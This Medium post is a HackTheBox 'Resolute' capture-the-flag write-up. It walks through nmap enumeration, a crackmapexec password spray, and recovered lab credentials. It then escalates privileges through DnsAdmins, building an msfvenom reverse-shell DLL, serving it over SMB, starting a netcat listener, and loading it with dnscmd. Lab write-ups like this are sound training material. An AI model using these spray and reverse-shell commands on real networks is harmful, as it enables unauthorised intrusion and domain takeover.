Open in app

Sign in

Write

Sign in

Resolute Writeup — HackTheBox

REBRON SECURITY
SUDOROOT
Published in
5 min readMay 31, 2020

Made by RebornSec ®

This great box is made up by egre55. Without further do, lets jump to our box .

Enumeration phase :

As usual let’s start with Nmap scan :

PORT     STATE SERVICE      REASON          VERSION
53/tcp   open  domain?      syn-ack ttl 127
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-29 02:41:15Z)
135/tcp  open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?    syn-ack ttl 127
593/tcp  open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped   syn-ack ttl 127
3268/tcp open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped   syn-ack ttl 127
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/28%Time=5ED073BE%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2h30m57s, deviation: 4h02m29s, median: 10m56s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 41231/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55070/udp): CLEAN (Timeout)
|   Check 4 (port 26625/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-28T19:42:06-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-29T02:42:08
|_  start_date: 2020-05-29T02:17:47Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

As we can see there is several ports open :

53,88,135,139,189,445,464,636,593,3268,3269

Some ports are weird, but let’s start first by enumerating the SMB2,these are some useful links to understand the way how SMB works :

Server Message Block

Le protocole SMB (Server Message Block ) est un protocole permettant le partage de ressources ( fichiers et…

fr.wikipedia.org

https://www.samba.org/~tridge/smb2.pdf

This the result we found after we enumerate :

We got some possibly useful usernames, lets keep digging, and we found our missing part using enum4linux :

It looks like the initial password of the new users is :

Welcome123!

But if we use it with the user Markov will not work, so we need to tested with all other users we got recently :

abigail
Administrator
angela
annette
annika
claire
claude
DefaultAccount
felicia
fred
Guest
gustavo
krbtgt
marcus
marko
melanie
naoki
paulo
per
ryan
sally
simon
steve
stevie
sunita
ulf
zach

We test it with the tool Crackmapexec all long with the password :

crackmapexec smb 10.10.10.169 -u users.txt -p pass.txt

We got the user that own this password :

melanie:Welcome123!

And if we log in we get our user.txt :

Root phase :

Digging inside the directories i found this file hidden contain juicy credentials :

ryan:Serv3r4Admin4cc123!

Digging in ryan repositories we found a note left for ryan from his team :

Also ryan is a member of the groupes :

MEGABANK\Contractors

MEGABANK\DnsAdmins

Searching for some way to exploit it i found this article :

Windows Privilege Escalation: DNSAdmins to Domain Admins — Server Level DLL Injection

Say you have compromised a Windows machine that provides Active Directory Directory Services to its users and have…

www.abhizer.com

msfvenom -p windows/x64/shell_reverse_tcp LHOST={your-ip} LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll

Then launching our smbserver.py :

python ./smbserver.py SHARE ~/Desktop/

Then we launch our netcat in our machine :

nc -nvlp 4444

Intercepting our shell in the user ryan :

dnscmd.exe /config /serverlevelplugindll \\{your-ip}\share\shell.dll

And VOILA we own the box :D

And here we got the root flag, happy hacking !

Hackthebox
Windows
Hacking
Cybersecurity
Htb

--

--

REBRON SECURITY
SUDOROOT

Written by REBRON SECURITY

13 Followers
Editor for

Cyber Security Specialist

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams